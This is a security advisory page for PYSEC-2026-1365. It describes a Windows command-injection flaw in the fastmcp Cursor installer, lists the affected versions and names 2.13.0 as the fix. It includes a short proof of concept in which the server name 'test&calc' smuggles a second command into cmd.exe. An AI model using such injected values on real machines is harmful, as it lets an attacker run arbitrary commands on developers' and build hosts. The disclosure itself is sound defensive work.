PYSEC-2026-1365

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/fastmcp/PYSEC-2026-1365.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-1365
Aliases
Published
2026-07-07T16:03:08.659725Z
Modified
2026-07-07T17:47:12.941242351Z
Severity
  • 5.4 (Medium) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
FastMCP vulnerable to windows command injection in FastMCP Cursor installer via server_name
Details

Summary

A command-injection vulnerability lets any attacker who can influence the server_name field of an MCP execute arbitrary OS commands on Windows hosts that run fastmcp install cursor

Details

  1. generatecursordeeplink(servername, …) embeds servername verbatim in a cursor://…?name= query string.
  2. open_deeplink() is invoked with shell=True only on Windows. That calls cmd.exe /c start <deeplink>.
  3. Any cmd metacharacter inside server_name (&, |, >, ^, …) escapes the start command and spawns an attacker-chosen process.

PoC

server.py


import random
from fastmcp import FastMCP

mcp = FastMCP(name="test&calc")

@mcp.tool
def roll_dice(n_dice: int) -> list[int]:
    """Roll `n_dice` 6-sided dice and return the results."""
    return [random.randint(1, 6) for _ in range(n_dice)]

if __name__ == "__main__":
    mcp.run()

then run in the terminal: fastmcp install cursor server.py

Impact

OS Command / Shell Injection (CWE-78) Every Windows host that runs fastmcp install cursor is at risk. Developers on their local workstations, CI/CD agents and corporate build machines alike.

References

Affected packages

PyPI / fastmcp

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.13.0

Affected versions

0.*
0.1.0
0.2.0
0.3.0
0.3.1
0.3.2
0.3.3
0.3.4
0.3.5
0.4.0
0.4.1
1.*
1.0
2.*
2.0.0
2.1.0
2.1.1
2.1.2
2.2.0
2.2.1
2.2.2
2.2.3
2.2.4
2.2.5
2.2.6
2.2.7
2.2.8
2.2.9
2.2.10
2.3.0rc1
2.3.0
2.3.1
2.3.2
2.3.3
2.3.4
2.3.5
2.4.0
2.5.0
2.5.1
2.5.2
2.6.0
2.6.1
2.7.0
2.7.1
2.8.0
2.8.1
2.9.0
2.9.1
2.9.2
2.10.0
2.10.1
2.10.2
2.10.3
2.10.4
2.10.5
2.10.6
2.11.0
2.11.1
2.11.2
2.11.3
2.12.0rc1
2.12.0
2.12.1
2.12.2
2.12.3
2.12.4
2.12.5
2.13.0rc1
2.13.0rc2
2.13.0rc3

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/fastmcp/PYSEC-2026-1365.yaml"